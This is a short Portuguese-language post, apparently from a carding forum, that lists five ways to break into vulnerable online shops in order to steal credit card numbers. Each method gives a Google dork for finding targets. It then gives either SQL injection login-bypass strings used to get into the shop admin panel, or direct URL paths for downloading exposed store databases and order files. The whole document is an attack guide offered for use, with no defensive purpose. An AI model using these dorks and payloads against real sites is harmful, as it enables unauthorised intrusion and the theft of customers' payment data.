Vou deixar aqui alguns exploits que podem ser usados para ter acesso a um site

vulner�vel e pegar as CC's.

Primeira maneira

google dork --> inurl:"/cart.php?m="

como a url deve ser --> http://alvo.com/store/cart.php?m=view
falha --> troque o cart.php?m=view por /admin
pagina de login do adm --> http://abc.com/store/admin
username : 'or"="
Password : 'or"=
se o site estiver vulner�vel voc� ir� logar como admin na shop.

Segunda maneira

google dork --> inurl:"Lobby.asp"

como a url deve ser --> http://www.alvo.com/mall/lobby.asp
falha --> mude a parte /mall/lobby.asp para /fpdb/shop.mdb
url com a falha --> http://www.alvo.com/fpdb/shop.mdb
se o site estiver vulner�vel o download do db ir� iniciar

Terceira maneira

google dork :--> inurl:"/shopadmin.asp"

como a url deve ser --> http://www.alvo.com/shopadmin.asp
user : 'or'1
pass : 'or'1
ter� acesso ao db admin se o site estiver vulner�vel

Quarta maneira

google dork --> allinurl:/metacart/

url do alvo --> http://www.alvo.com/metacart/about.asp
alvo --> /database/metacart.mdb
url com a falha --> http://www.abc.com/metacart/database/metacart.mdb
download do db se o site estiver vul

Quinta maneira

google dork --> allinurl:/DCShop/

url do alvo --> http://www.alvo.com/xxxx/DCShop/xxxx
falhas --> /DCShop/orders/orders.txt ou /DCShop/Orders/orders.txt
url com a falha --> http://www.alvo.com/xxxx/DCShop/orders/orders.txt ou
http://www.alvo.com/xxxx/DCShop/Orders/orders.txt